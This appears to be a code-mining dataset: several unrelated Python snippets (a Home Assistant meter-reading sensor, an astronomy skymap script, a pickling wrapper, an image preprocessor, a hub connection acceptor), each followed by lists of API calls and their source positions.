self._debug: bool = bool(config[CONF_DEBUG] if CONF_DEBUG in config else False)
self._debug_path = hass.config.path("debug/" + DOMAIN) if self._debug else None
self._error_count = 0
if self._debug_path is not None and not os.path.exists(self._debug_path):
os.makedirs(self._debug_path)
if entity_name:
self._attr_name = entity_name
else:
self._attr_name = f"Unnamed Meter {split_entity_id(self._camera)[1]}"
self._attr_unique_id = generate_entity_id(
"sensor.{}_" + STATE_CLASS_TOTAL_INCREASING,
self._attr_name,
hass=hass,
)
device_class = (
config[CONF_DEVICE_CLASS]
if CONF_DEVICE_CLASS in config
else DEVICE_CLASS_POWER
)
self.entity_description = SensorEntityDescription(
key=STATE_CLASS_TOTAL_INCREASING,
name=self._attr_name,
state_class=STATE_CLASS_TOTAL_INCREASING,
device_class=device_class,
native_unit_of_measurement=config[CONF_UNIT_OF_MEASUREMENT]
if CONF_UNIT_OF_MEASUREMENT in config
else ENERGY_KILO_WATT_HOUR,
)
if device_class == DEVICE_CLASS_POWER or device_class == DEVICE_CLASS_ENERGY:
self.entity_description.icon = ICON_ELECTRICITY
elif device_class == DEVICE_CLASS_GAS:
self.entity_description.icon = ICON_GAS
elif device_class == DEVICE_CLASS_WATER:
self.entity_description.icon = ICON_WATER
self._metertype: str = (
config[CONF_METERTYPE] if CONF_METERTYPE in config else METERTYPEDIALS
)
self._dials: list[str] = (
config[CONF_DIALS] if CONF_DIALS in config else DIAL_DEFAULT_READOUT
)
self._dial_size = int(
config[CONF_DIAL_SIZE] if CONF_DIAL_SIZE in config else 100
)
self._digits: int = int(
config[CONF_DIGITS_COUNT] if CONF_DIGITS_COUNT in config else 0
)
self._decimals: int = int(
config[CONF_DECIMALS_COUNT] if CONF_DECIMALS_COUNT in config else 0
)
self._ocr_key: str = (
config[CONF_OCR_API_KEY] if CONF_OCR_API_KEY in config else ""
)
# self._ocr_url: str = (
# config[CONF_OCR_API_URL] if CONF_OCR_API_URL in config else ""
# )
self._last_update_success: datetime = None
def _set_attributes(self):
self._attr_extra_state_attributes = {
CONF_METERTYPE: self._metertype,
"last_update": self._last_update_success,
}
@property
def confidence(self):
"""Return minimum confidence for send events."""
return self._confidence
@property
def camera_entity(self):
"""Return camera entity id from process pictures."""
return self._camera
async def async_added_to_hass(self) -> None:
"""Handle entity which will be added."""
await super().async_added_to_hass()
last_state = await self.async_get_last_state()
if last_state is not None and last_state.state != "unknown":
self._attr_state = last_state.state
self._attr_native_value = last_state.state
# def _handle_event(self, event):
# device_id = ENTITY_ID_FORMAT.format(slugify(event.data.get("device_name")))
# _LOGGER.debug("Got esphome.device_alive event for %s" % device_id)
# if self._camera == device_id:
# asyncio.run_coroutine_threadsafe(self.async_update(), self.hass.loop)
# return
async def async_update(self):
"""First turn the led on to grab an image"""
if self._light is not None:
_LOGGER.debug("Turning on %s" % self._light)
await self.hass.services.async_call(
DOMAIN_LIGHT,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: self._light},
)
@callback
async def call_later(*_):
try:
_LOGGER.debug("Taking a snapshot from %s..." % self.entity_id)
await super(MeterParserMeasurementEntity, self).async_update()
except Exception:
_LOGGER.error(traceback.format_exc())
finally:
_LOGGER.debug("Turning off %s" % self._light)
await self.hass.services.async_call(
DOMAIN_LIGHT,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: self._light},
)
async_call_later(self.hass, 1.5, call_later)
else:
try:
_LOGGER.debug("Taking a snapshot from %s..." % self.entity_id)
await super(MeterParserMeasurementEntity, self).async_update()
except Exception:
_LOGGER.error(traceback.format_exc())
async def async_process_image(self, image):
"""Process image."""
await self.hass.async_add_executor_job(self.process_image, image)
if self._attr_attribution is None:
registry = er.async_get(self.hass)
entry = registry.entities.get(self._camera)
self._attr_attribution = ATTRIBUTION % (
entry.name if entry is not None else split_entity_id(self._camera)[1]
)
def process_image(self, image):
"""Update data via opencv."""
reading = 0
prev_reading = 0
_LOGGER.debug("Processing image...")
try:
cv_image = cv2.imdecode(
numpy.asarray(bytearray(image)), cv2.IMREAD_UNCHANGED
)
cv_image = zoom_to_roi(cv_image)
if self._metertype == METERTYPEDIALS:
reading = float(
parse_dials(
cv_image,
readout=self._dials,
decimals_count=self._decimals,
entity_id=self._attr_unique_id,
minDiameter=self._dial_size,
maxDiameter=self._dial_size + 250,
debug_path=self._debug_path,
)
)
elif self._metertype == METERTYPEDIGITS:
reading = float(
parse_digits(
cv_image,
self._digits,
self._decimals,
self._ocr_key,
# self._ocr_url,
self._attr_unique_id,
debug_path=self._debug_path,
)
)
except Exception:
_LOGGER.error(traceback.format_exc())
if self._attr_native_value is not None and str(self._attr_native_value).isnumeric():
prev_reading = float(self._attr_native_value)
if reading > 0:
if reading >= prev_reading:
self._attr_state = reading
self._attr_native_value = reading
self._last_update_success = datetime.datetime.now()
self._attr_available = True
self._error_count = 0
else:
self._error_count += 1
self._attr_available = False if self._error_count > 10 else True
_LOGGER.error(
"New reading is less than current reading. Got your meter replaced? Reset this integration."
)
else:
self._error_count += 1
self._attr_available = False if self._error_count > 10 else True
self._set_attributes()
| [
"logging.getLogger",
"homeassistant.helpers.entity.generate_entity_id",
"voluptuous.Required",
"os.path.exists",
"traceback.format_exc",
"homeassistant.core.split_entity_id",
"os.makedirs",
"homeassistant.components.sensor.SensorEntityDescription",
"homeassistant.helpers.entity_registry.async_get",
... | [((3565, 3595), 'logging.getLogger', 'logging.getLogger', (['__package__'], {}), '(__package__)\n', (3582, 3595), False, 'import logging\n'), ((2482, 2510), 'voluptuous.Required', 'vol.Required', (['CONF_ENTITY_ID'], {}), '(CONF_ENTITY_ID)\n', (2494, 2510), True, 'import voluptuous as vol\n'), ((2553, 2576), 'voluptuous.Optional', 'vol.Optional', (['CONF_NAME'], {}), '(CONF_NAME)\n', (2565, 2576), True, 'import voluptuous as vol\n'), ((2597, 2631), 'voluptuous.Optional', 'vol.Optional', (['CONF_LIGHT_ENTITY_ID'], {}), '(CONF_LIGHT_ENTITY_ID)\n', (2609, 2631), True, 'import voluptuous as vol\n'), ((2512, 2543), 'homeassistant.helpers.config_validation.entity_domain', 'cv.entity_domain', (['DOMAIN_CAMERA'], {}), '(DOMAIN_CAMERA)\n', (2528, 2543), True, 'import homeassistant.helpers.config_validation as cv\n'), ((2633, 2663), 'homeassistant.helpers.config_validation.entity_domain', 'cv.entity_domain', (['DOMAIN_LIGHT'], {}), '(DOMAIN_LIGHT)\n', (2649, 2663), True, 'import homeassistant.helpers.config_validation as cv\n'), ((2730, 2755), 'voluptuous.Required', 'vol.Required', (['CONF_SOURCE'], {}), '(CONF_SOURCE)\n', (2742, 2755), True, 'import voluptuous as vol\n'), ((2807, 2835), 'voluptuous.Required', 'vol.Required', (['CONF_METERTYPE'], {}), '(CONF_METERTYPE)\n', (2819, 2835), True, 'import voluptuous as vol\n'), ((2865, 2895), 'voluptuous.Optional', 'vol.Optional', (['CONF_OCR_API_KEY'], {}), '(CONF_OCR_API_KEY)\n', (2877, 2895), True, 'import voluptuous as vol\n'), ((2916, 2958), 'voluptuous.Optional', 'vol.Optional', (['CONF_DIGITS_COUNT'], {'default': '(6)'}), '(CONF_DIGITS_COUNT, default=6)\n', (2928, 2958), True, 'import voluptuous as vol\n'), ((2985, 3029), 'voluptuous.Optional', 'vol.Optional', (['CONF_DECIMALS_COUNT'], {'default': '(0)'}), '(CONF_DECIMALS_COUNT, default=0)\n', (2997, 3029), True, 'import voluptuous as vol\n'), ((3056, 3095), 'voluptuous.Optional', 'vol.Optional', (['CONF_DEBUG'], {'default': '(False)'}), '(CONF_DEBUG, default=False)\n', (3068, 3095), True, 'import voluptuous as vol\n'), ((3117, 3148), 'voluptuous.Required', 'vol.Required', (['CONF_DEVICE_CLASS'], {}), '(CONF_DEVICE_CLASS)\n', (3129, 3148), True, 'import voluptuous as vol\n'), ((3190, 3228), 'voluptuous.Required', 'vol.Required', (['CONF_UNIT_OF_MEASUREMENT'], {}), '(CONF_UNIT_OF_MEASUREMENT)\n', (3202, 3228), True, 'import voluptuous as vol\n'), ((3268, 3292), 'voluptuous.Optional', 'vol.Optional', (['CONF_DIALS'], {}), '(CONF_DIALS)\n', (3280, 3292), True, 'import voluptuous as vol\n'), ((3318, 3359), 'voluptuous.Optional', 'vol.Optional', (['CONF_DIAL_SIZE'], {'default': '(100)'}), '(CONF_DIAL_SIZE, default=100)\n', (3330, 3359), True, 'import voluptuous as vol\n'), ((2757, 2797), 'voluptuous.All', 'vol.All', (['cv.ensure_list', '[SOURCE_SCHEMA]'], {}), '(cv.ensure_list, [SOURCE_SCHEMA])\n', (2764, 2797), True, 'import voluptuous as vol\n'), ((2837, 2855), 'voluptuous.In', 'vol.In', (['METERTYPES'], {}), '(METERTYPES)\n', (2843, 2855), True, 'import voluptuous as vol\n'), ((3150, 3180), 'voluptuous.In', 'vol.In', (['ALLOWED_DEVICE_CLASSES'], {}), '(ALLOWED_DEVICE_CLASSES)\n', (3156, 3180), True, 'import voluptuous as vol\n'), ((3230, 3258), 'voluptuous.In', 'vol.In', (['UNITS_OF_MEASUREMENT'], {}), '(UNITS_OF_MEASUREMENT)\n', (3236, 3258), True, 'import voluptuous as vol\n'), ((5337, 5433), 'homeassistant.helpers.entity.generate_entity_id', 'generate_entity_id', (["('sensor.{}_' + STATE_CLASS_TOTAL_INCREASING)", 'self._attr_name'], {'hass': 'hass'}), "('sensor.{}_' + STATE_CLASS_TOTAL_INCREASING, self.\n _attr_name, hass=hass)\n", (5355, 5433), False, 'from homeassistant.helpers.entity import generate_entity_id\n'), ((5664, 5957), 'homeassistant.components.sensor.SensorEntityDescription', 'SensorEntityDescription', ([], {'key': 'STATE_CLASS_TOTAL_INCREASING', 'name': 'self._attr_name', 'state_class': 'STATE_CLASS_TOTAL_INCREASING', 'device_class': 'device_class', 'native_unit_of_measurement': '(config[CONF_UNIT_OF_MEASUREMENT] if CONF_UNIT_OF_MEASUREMENT in config else\n ENERGY_KILO_WATT_HOUR)'}), '(key=STATE_CLASS_TOTAL_INCREASING, name=self.\n _attr_name, state_class=STATE_CLASS_TOTAL_INCREASING, device_class=\n device_class, native_unit_of_measurement=config[\n CONF_UNIT_OF_MEASUREMENT] if CONF_UNIT_OF_MEASUREMENT in config else\n ENERGY_KILO_WATT_HOUR)\n', (5687, 5957), False, 'from homeassistant.components.sensor import STATE_CLASS_TOTAL_INCREASING, SensorEntity, SensorEntityDescription\n'), ((5112, 5141), 'os.makedirs', 'os.makedirs', (['self._debug_path'], {}), '(self._debug_path)\n', (5123, 5141), False, 'import os\n'), ((9461, 9505), 'homeassistant.helpers.event.async_call_later', 'async_call_later', (['self.hass', '(1.5)', 'call_later'], {}), '(self.hass, 1.5, call_later)\n', (9477, 9505), False, 'from homeassistant.helpers.event import async_call_later\n'), ((9997, 10020), 'homeassistant.helpers.entity_registry.async_get', 'er.async_get', (['self.hass'], {}), '(self.hass)\n', (10009, 10020), True, 'from homeassistant.helpers import entity_registry as er\n'), ((5066, 5098), 'os.path.exists', 'os.path.exists', (['self._debug_path'], {}), '(self._debug_path)\n', (5080, 5098), False, 'import os\n'), ((11966, 11989), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (11987, 11989), False, 'import datetime\n'), ((11589, 11611), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (11609, 11611), False, 'import traceback\n'), ((5270, 5299), 'homeassistant.core.split_entity_id', 'split_entity_id', (['self._camera'], {}), '(self._camera)\n', (5285, 5299), False, 'from homeassistant.core import HomeAssistant, callback, split_entity_id\n'), ((9755, 9777), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (9775, 9777), False, 'import traceback\n'), ((10183, 10212), 'homeassistant.core.split_entity_id', 'split_entity_id', (['self._camera'], {}), '(self._camera)\n', (10198, 10212), False, 'from homeassistant.core import HomeAssistant, callback, split_entity_id\n'), ((9119, 9141), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (9139, 9141), False, 'import traceback\n')] |
from irf import estimate_exposure_time, build_exposure_map
import click
import fact.io as fio
import pandas as pd
from astroquery.skyview import SkyView
from astropy.wcs import WCS
from astropy.visualization import ImageNormalize, ZScaleInterval, AsinhStretch
import astropy.units as u
from astropy.coordinates import SkyCoord
import matplotlib.pyplot as plt
@u.quantity_input(fov=u.deg)
def get_sdss_sky_image(img_center, fov=9 * u.deg, n_pix=1000):
'''
A small helper method which uses astroquery to get an image from the sdss.
This requires internet access and fails pretty often due to http timeouts.
'''
hdu = SkyView.get_images(
position=img_center,
pixels=n_pix,
survey=['DSS'],
width=fov,
height=fov)[0][0]
img = hdu.data
wcs = WCS(hdu.header)
return img, wcs
@click.command()
@click.argument(
'dl3_path',
type=click.Path(file_okay=True, dir_okay=False),
)
@click.argument(
'output_path',
type=click.Path(file_okay=True, dir_okay=False, exists=False),
)
@click.option(
'-n',
'--n_pix',
default=1000,
help='number of pixels along the edge of the produced image',
)
@click.option(
'-s',
'--source_name',
default=None,
help=
'If supplied, e.g. "Crab Nebula" will draw the position of that source into the image',
)
@click.option(
'--background/--no-background',
default=True,
help='If true, downloads SDSS image for backgrund image in the plot')
def main(dl3_path, output_path, n_pix, source_name, background):
'''
Takes FACT dl3 output and plots a skymap which is being saved to the output_path.
'''
runs = fio.read_data(dl3_path, key='runs')
dl3 = fio.read_data(dl3_path, key='events')
data = pd.merge(runs, dl3, on=['run_id', 'night'])
timestamps = pd.to_datetime(data.timestamp).values
total_ontime = estimate_exposure_time(timestamps)
print('Total estimated exposure time: {}'.format(total_ontime.to(u.h)))
ra_pointing = data.right_ascension.values * u.hourangle
dec_pointing = data.declination.values * u.deg
pointing = SkyCoord(ra=ra_pointing, dec=dec_pointing)
img = None
wcs = None
if background:
img_center = SkyCoord(ra=pointing.ra.mean(), dec=pointing.dec.mean())
img, wcs = get_sdss_sky_image(
img_center=img_center, n_pix=n_pix, fov=9 * u.deg)
mask, wcs = build_exposure_map(pointing, timestamps, shape=(n_pix, n_pix))
ax = plot_exposure(mask, wcs, image=img)
if source_name:
source = SkyCoord.from_name('Crab Nebula')
ax.scatter(
source.ra.deg,
source.dec.deg,
transform=ax.get_transform('icrs'),
label=source_name,
s=10**2,
facecolors='none',
edgecolors='r',
)
ax.legend()
plt.savefig(output_path, dpi=200)
def plot_exposure(mask, wcs, image=None):
plt.figure(figsize=(10, 10))
ax = plt.subplot(projection=wcs)
if image is not None:
norm = ImageNormalize(
image,
interval=ZScaleInterval(contrast=0.05),
stretch=AsinhStretch(a=0.2))
ax.imshow(image, cmap='gray', norm=norm, interpolation='nearest')
d = ax.imshow(mask, alpha=0.7)
cb = plt.colorbar(d)
cb.set_label('Live Time / Hours')
ax.set_xlabel('Galactic Longitude')
ax.set_ylabel('Galactic Latitude')
return ax
if __name__ == '__main__':
main()
| [
"astropy.visualization.AsinhStretch",
"astroquery.skyview.SkyView.get_images",
"pandas.to_datetime",
"astropy.units.quantity_input",
"click.option",
"click.command",
"fact.io.read_data",
"matplotlib.pyplot.savefig",
"astropy.coordinates.SkyCoord.from_name",
"pandas.merge",
"irf.estimate_exposure... | [((363, 390), 'astropy.units.quantity_input', 'u.quantity_input', ([], {'fov': 'u.deg'}), '(fov=u.deg)\n', (379, 390), True, 'import astropy.units as u\n'), ((847, 862), 'click.command', 'click.command', ([], {}), '()\n', (860, 862), False, 'import click\n'), ((1057, 1167), 'click.option', 'click.option', (['"""-n"""', '"""--n_pix"""'], {'default': '(1000)', 'help': '"""number of pixels along the edge of the produced image"""'}), "('-n', '--n_pix', default=1000, help=\n 'number of pixels along the edge of the produced image')\n", (1069, 1167), False, 'import click\n'), ((1183, 1335), 'click.option', 'click.option', (['"""-s"""', '"""--source_name"""'], {'default': 'None', 'help': '"""If supplied, e.g. "Crab Nebula" will draw the position of that source into the image"""'}), '(\'-s\', \'--source_name\', default=None, help=\n \'If supplied, e.g. "Crab Nebula" will draw the position of that source into the image\'\n )\n', (1195, 1335), False, 'import click\n'), ((1351, 1484), 'click.option', 'click.option', (['"""--background/--no-background"""'], {'default': '(True)', 'help': '"""If true, downloads SDSS image for backgrund image in the plot"""'}), "('--background/--no-background', default=True, help=\n 'If true, downloads SDSS image for backgrund image in the plot')\n", (1363, 1484), False, 'import click\n'), ((808, 823), 'astropy.wcs.WCS', 'WCS', (['hdu.header'], {}), '(hdu.header)\n', (811, 823), False, 'from astropy.wcs import WCS\n'), ((1671, 1706), 'fact.io.read_data', 'fio.read_data', (['dl3_path'], {'key': '"""runs"""'}), "(dl3_path, key='runs')\n", (1684, 1706), True, 'import fact.io as fio\n'), ((1717, 1754), 'fact.io.read_data', 'fio.read_data', (['dl3_path'], {'key': '"""events"""'}), "(dl3_path, key='events')\n", (1730, 1754), True, 'import fact.io as fio\n'), ((1767, 1810), 'pandas.merge', 'pd.merge', (['runs', 'dl3'], {'on': "['run_id', 'night']"}), "(runs, dl3, on=['run_id', 'night'])\n", (1775, 1810), True, 'import pandas as pd\n'), ((1886, 1920), 'irf.estimate_exposure_time', 'estimate_exposure_time', (['timestamps'], {}), '(timestamps)\n', (1908, 1920), False, 'from irf import estimate_exposure_time, build_exposure_map\n'), ((2124, 2166), 'astropy.coordinates.SkyCoord', 'SkyCoord', ([], {'ra': 'ra_pointing', 'dec': 'dec_pointing'}), '(ra=ra_pointing, dec=dec_pointing)\n', (2132, 2166), False, 'from astropy.coordinates import SkyCoord\n'), ((2414, 2476), 'irf.build_exposure_map', 'build_exposure_map', (['pointing', 'timestamps'], {'shape': '(n_pix, n_pix)'}), '(pointing, timestamps, shape=(n_pix, n_pix))\n', (2432, 2476), False, 'from irf import estimate_exposure_time, build_exposure_map\n'), ((2863, 2896), 'matplotlib.pyplot.savefig', 'plt.savefig', (['output_path'], {'dpi': '(200)'}), '(output_path, dpi=200)\n', (2874, 2896), True, 'import matplotlib.pyplot as plt\n'), ((2945, 2973), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(10, 10)'}), '(figsize=(10, 10))\n', (2955, 2973), True, 'import matplotlib.pyplot as plt\n'), ((2983, 3010), 'matplotlib.pyplot.subplot', 'plt.subplot', ([], {'projection': 'wcs'}), '(projection=wcs)\n', (2994, 3010), True, 'import matplotlib.pyplot as plt\n'), ((3300, 3315), 'matplotlib.pyplot.colorbar', 'plt.colorbar', (['d'], {}), '(d)\n', (3312, 3315), True, 'import matplotlib.pyplot as plt\n'), ((1829, 1859), 'pandas.to_datetime', 'pd.to_datetime', (['data.timestamp'], {}), '(data.timestamp)\n', (1843, 1859), True, 'import pandas as pd\n'), ((2560, 2593), 'astropy.coordinates.SkyCoord.from_name', 'SkyCoord.from_name', (['"""Crab Nebula"""'], {}), "('Crab Nebula')\n", (2578, 2593), False, 'from astropy.coordinates import SkyCoord\n'), ((905, 947), 'click.Path', 'click.Path', ([], {'file_okay': '(True)', 'dir_okay': '(False)'}), '(file_okay=True, dir_okay=False)\n', (915, 947), False, 'import click\n'), ((996, 1052), 'click.Path', 'click.Path', ([], {'file_okay': '(True)', 'dir_okay': '(False)', 'exists': '(False)'}), '(file_okay=True, dir_okay=False, exists=False)\n', (1006, 1052), False, 'import click\n'), ((638, 735), 'astroquery.skyview.SkyView.get_images', 'SkyView.get_images', ([], {'position': 'img_center', 'pixels': 'n_pix', 'survey': "['DSS']", 'width': 'fov', 'height': 'fov'}), "(position=img_center, pixels=n_pix, survey=['DSS'], width\n =fov, height=fov)\n", (656, 735), False, 'from astroquery.skyview import SkyView\n'), ((3109, 3138), 'astropy.visualization.ZScaleInterval', 'ZScaleInterval', ([], {'contrast': '(0.05)'}), '(contrast=0.05)\n', (3123, 3138), False, 'from astropy.visualization import ImageNormalize, ZScaleInterval, AsinhStretch\n'), ((3160, 3179), 'astropy.visualization.AsinhStretch', 'AsinhStretch', ([], {'a': '(0.2)'}), '(a=0.2)\n', (3172, 3179), False, 'from astropy.visualization import ImageNormalize, ZScaleInterval, AsinhStretch\n')] |
""" Class to serialize data for multiprocessing.
Inspired by: https://github.com/openai/baselines/blob/master/baselines/common/vec_env/__init__.py
"""
import cloudpickle
import pickle
class CloudpickleWrapper(object):
""" Uses `cloudpickle` to serialize contents. """
def __init__(self, data):
self.data = data
def __getstate__(self):
return cloudpickle.dumps(self.x)
def __setstate__(self, data):
self.data = pickle.loads(data)
| [
"cloudpickle.dumps",
"pickle.loads"
] | [((375, 400), 'cloudpickle.dumps', 'cloudpickle.dumps', (['self.x'], {}), '(self.x)\n', (392, 400), False, 'import cloudpickle\n'), ((456, 474), 'pickle.loads', 'pickle.loads', (['data'], {}), '(data)\n', (468, 474), False, 'import pickle\n')] |
import numpy as np
import cv2
from semantic_segmentation.data_structure.image_handler import ImageHandler
class Preprocessor:
def __init__(self, image_size):
self.image_size = image_size
self.min_height = 16
self.min_width = 16
self.max_height = 900
self.max_width = 900
self.obox = None
def resize(self, image):
img_h = ImageHandler(image)
if None in self.image_size:
return self.rescale(image, self.max_width, self.max_height, is_lbm=False)
return img_h.resize(height=self.image_size[0], width=self.image_size[1])
def normalize(self, image):
epsilon = 1e-6
mean_mat = np.mean(image)
var_mat = np.var(image)
if var_mat != 0:
mat_norm = (image - mean_mat) / var_mat
min_mat = np.min(mat_norm)
max_mat = np.max(mat_norm)
mat_norm = (mat_norm - min_mat) / (max_mat - min_mat + epsilon)
else:
mat_norm = np.zeros(image.shape)
return mat_norm
def rescale(self, data, max_width, max_height, is_lbm=False):
height, width = data.shape[0], data.shape[1]
if height >= max_height:
new_height = max_height
new_width = int(width * new_height / height)
if is_lbm:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_NEAREST)
else:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_CUBIC)
height, width = data.shape[0], data.shape[1]
if width >= max_width:
new_width = max_width
new_height = int(height * new_width / width)
if is_lbm:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_NEAREST)
else:
data = cv2.resize(data, (int(new_width), int(new_height)), interpolation=cv2.INTER_CUBIC)
height, width = data.shape[0], data.shape[1]
return np.reshape(data, (height, width, -1))
def pad(self, image):
img_h = ImageHandler(image)
height, width, ch = image.shape
if height > width:
if height >= self.image_size[0]:
new_height = self.image_size[0]
new_width = int(width * new_height / height)
image = img_h.resize(height=new_height, width=new_width)
else:
if width >= self.image_size[1]:
new_width = self.image_size[1]
new_height = int(height * new_width / width)
image = img_h.resize(height=new_height, width=new_width)
ih, iw = image.shape[:2]
ph, pw = self.image_size[0], self.image_size[1]
x = np.mean(image) * np.ones((ph, pw, ch))
sy1 = int(ph/2)-int(ih/2)
sx1 = int(pw/2)-int(iw/2)
if ch == 1:
image = np.expand_dims(image, axis=2)
x[sy1:sy1+ih, sx1:sx1+iw, :] = image
self.obox = [sx1, sy1, sx1 + iw, sy1 + ih]
return x
def apply(self, image):
image = self.resize(image)
img_h = ImageHandler(image)
if self.image_size[2] == 1:
image = img_h.gray()
image = np.expand_dims(image, axis=2)
image = self.normalize(image)
return image
def lbm_resize(self, lbm, width, height):
if None in [width, height]:
return self.rescale(lbm, self.max_width, self.max_height, is_lbm=True)
return cv2.resize(lbm,
(int(width), int(height)),
interpolation=cv2.INTER_NEAREST)
def apply_to_label_map(self, label_map):
label_map = self.lbm_resize(label_map, width=self.image_size[1], height=self.image_size[0])
if len(label_map.shape) < 3:
label_map = np.expand_dims(label_map, axis=2)
return label_map
| [
"numpy.mean",
"numpy.reshape",
"numpy.ones",
"semantic_segmentation.data_structure.image_handler.ImageHandler",
"numpy.max",
"numpy.zeros",
"numpy.expand_dims",
"numpy.min",
"numpy.var"
] | [((389, 408), 'semantic_segmentation.data_structure.image_handler.ImageHandler', 'ImageHandler', (['image'], {}), '(image)\n', (401, 408), False, 'from semantic_segmentation.data_structure.image_handler import ImageHandler\n'), ((687, 701), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (694, 701), True, 'import numpy as np\n'), ((720, 733), 'numpy.var', 'np.var', (['image'], {}), '(image)\n', (726, 733), True, 'import numpy as np\n'), ((2047, 2084), 'numpy.reshape', 'np.reshape', (['data', '(height, width, -1)'], {}), '(data, (height, width, -1))\n', (2057, 2084), True, 'import numpy as np\n'), ((2128, 2147), 'semantic_segmentation.data_structure.image_handler.ImageHandler', 'ImageHandler', (['image'], {}), '(image)\n', (2140, 2147), False, 'from semantic_segmentation.data_structure.image_handler import ImageHandler\n'), ((3152, 3171), 'semantic_segmentation.data_structure.image_handler.ImageHandler', 'ImageHandler', (['image'], {}), '(image)\n', (3164, 3171), False, 'from semantic_segmentation.data_structure.image_handler import ImageHandler\n'), ((833, 849), 'numpy.min', 'np.min', (['mat_norm'], {}), '(mat_norm)\n', (839, 849), True, 'import numpy as np\n'), ((872, 888), 'numpy.max', 'np.max', (['mat_norm'], {}), '(mat_norm)\n', (878, 888), True, 'import numpy as np\n'), ((1002, 1023), 'numpy.zeros', 'np.zeros', (['image.shape'], {}), '(image.shape)\n', (1010, 1023), True, 'import numpy as np\n'), ((2782, 2796), 'numpy.mean', 'np.mean', (['image'], {}), '(image)\n', (2789, 2796), True, 'import numpy as np\n'), ((2799, 2820), 'numpy.ones', 'np.ones', (['(ph, pw, ch)'], {}), '((ph, pw, ch))\n', (2806, 2820), True, 'import numpy as np\n'), ((2929, 2958), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(2)'}), '(image, axis=2)\n', (2943, 2958), True, 'import numpy as np\n'), ((3261, 3290), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(2)'}), '(image, axis=2)\n', (3275, 3290), True, 'import numpy as np\n'), ((3866, 3899), 'numpy.expand_dims', 'np.expand_dims', (['label_map'], {'axis': '(2)'}), '(label_map, axis=2)\n', (3880, 3899), True, 'import numpy as np\n')] |
import socket
import time
from tron import g, hub
from tron.Hub.Command.Decoders.ASCIICmdDecoder import ASCIICmdDecoder
from tron.Hub.Nub.Commanders import AuthStdinNub
from tron.Hub.Nub.Listeners import SocketListener
from tron.Hub.Reply.Encoders.ASCIIReplyEncoder import ASCIIReplyEncoder
name = 'TUI'
listenPort = 9877
def acceptTUI(in_f, out_f, addr=None):
""" Create a command source with the given fds as input and output. """
# Fetch a unique ID
#
nubID = g.nubIDs.gimme()
fullname = '%s_%d' % (name, nubID)
# all = ('tcc','mcp',
# 'hub','msg')
all = ('*', )
otherIP, otherPort = in_f.getpeername()
try:
otherFQDN = socket.getfqdn(otherIP)
except BaseException:
otherFQDN = 'unknown'
# os.system("/usr/bin/sudo /usr/local/bin/www-access add %s" % (otherIP))
d = ASCIICmdDecoder(needCID=False, EOL='\r\n', debug=1)
e = ASCIIReplyEncoder(EOL='\r', simple=True, debug=1, CIDfirst=True)
c = AuthStdinNub(g.poller,
in_f,
out_f,
name=fullname,
encoder=e,
decoder=d,
debug=1,
type='TUI',
needsAuth=True,
isUser=True,
otherIP=otherIP,
otherFQDN=otherFQDN)
c.taster.addToFilter(all, (), all)
hub.addCommander(c)
def start(poller):
stop()
lt = SocketListener(poller, listenPort, name, acceptTUI)
hub.addAcceptor(lt)
def stop():
a = hub.findAcceptor(name)
if a:
hub.dropAcceptor(a)
del a
time.sleep(0.5) # OK, why did I put this in here?
| [
"tron.hub.findAcceptor",
"tron.Hub.Command.Decoders.ASCIICmdDecoder.ASCIICmdDecoder",
"tron.g.nubIDs.gimme",
"socket.getfqdn",
"tron.Hub.Nub.Commanders.AuthStdinNub",
"tron.hub.addCommander",
"time.sleep",
"tron.hub.addAcceptor",
"tron.Hub.Reply.Encoders.ASCIIReplyEncoder.ASCIIReplyEncoder",
"tron... | [((485, 501), 'tron.g.nubIDs.gimme', 'g.nubIDs.gimme', ([], {}), '()\n', (499, 501), False, 'from tron import g, hub\n'), ((853, 904), 'tron.Hub.Command.Decoders.ASCIICmdDecoder.ASCIICmdDecoder', 'ASCIICmdDecoder', ([], {'needCID': '(False)', 'EOL': "'\\r\\n'", 'debug': '(1)'}), "(needCID=False, EOL='\\r\\n', debug=1)\n", (868, 904), False, 'from tron.Hub.Command.Decoders.ASCIICmdDecoder import ASCIICmdDecoder\n'), ((913, 977), 'tron.Hub.Reply.Encoders.ASCIIReplyEncoder.ASCIIReplyEncoder', 'ASCIIReplyEncoder', ([], {'EOL': "'\\r'", 'simple': '(True)', 'debug': '(1)', 'CIDfirst': '(True)'}), "(EOL='\\r', simple=True, debug=1, CIDfirst=True)\n", (930, 977), False, 'from tron.Hub.Reply.Encoders.ASCIIReplyEncoder import ASCIIReplyEncoder\n'), ((986, 1154), 'tron.Hub.Nub.Commanders.AuthStdinNub', 'AuthStdinNub', (['g.poller', 'in_f', 'out_f'], {'name': 'fullname', 'encoder': 'e', 'decoder': 'd', 'debug': '(1)', 'type': '"""TUI"""', 'needsAuth': '(True)', 'isUser': '(True)', 'otherIP': 'otherIP', 'otherFQDN': 'otherFQDN'}), "(g.poller, in_f, out_f, name=fullname, encoder=e, decoder=d,\n debug=1, type='TUI', needsAuth=True, isUser=True, otherIP=otherIP,\n otherFQDN=otherFQDN)\n", (998, 1154), False, 'from tron.Hub.Nub.Commanders import AuthStdinNub\n'), ((1421, 1440), 'tron.hub.addCommander', 'hub.addCommander', (['c'], {}), '(c)\n', (1437, 1440), False, 'from tron import g, hub\n'), ((1483, 1534), 'tron.Hub.Nub.Listeners.SocketListener', 'SocketListener', (['poller', 'listenPort', 'name', 'acceptTUI'], {}), '(poller, listenPort, name, acceptTUI)\n', (1497, 1534), False, 'from tron.Hub.Nub.Listeners import SocketListener\n'), ((1539, 1558), 'tron.hub.addAcceptor', 'hub.addAcceptor', (['lt'], {}), '(lt)\n', (1554, 1558), False, 'from tron import g, hub\n'), ((1581, 1603), 'tron.hub.findAcceptor', 'hub.findAcceptor', (['name'], {}), '(name)\n', (1597, 1603), 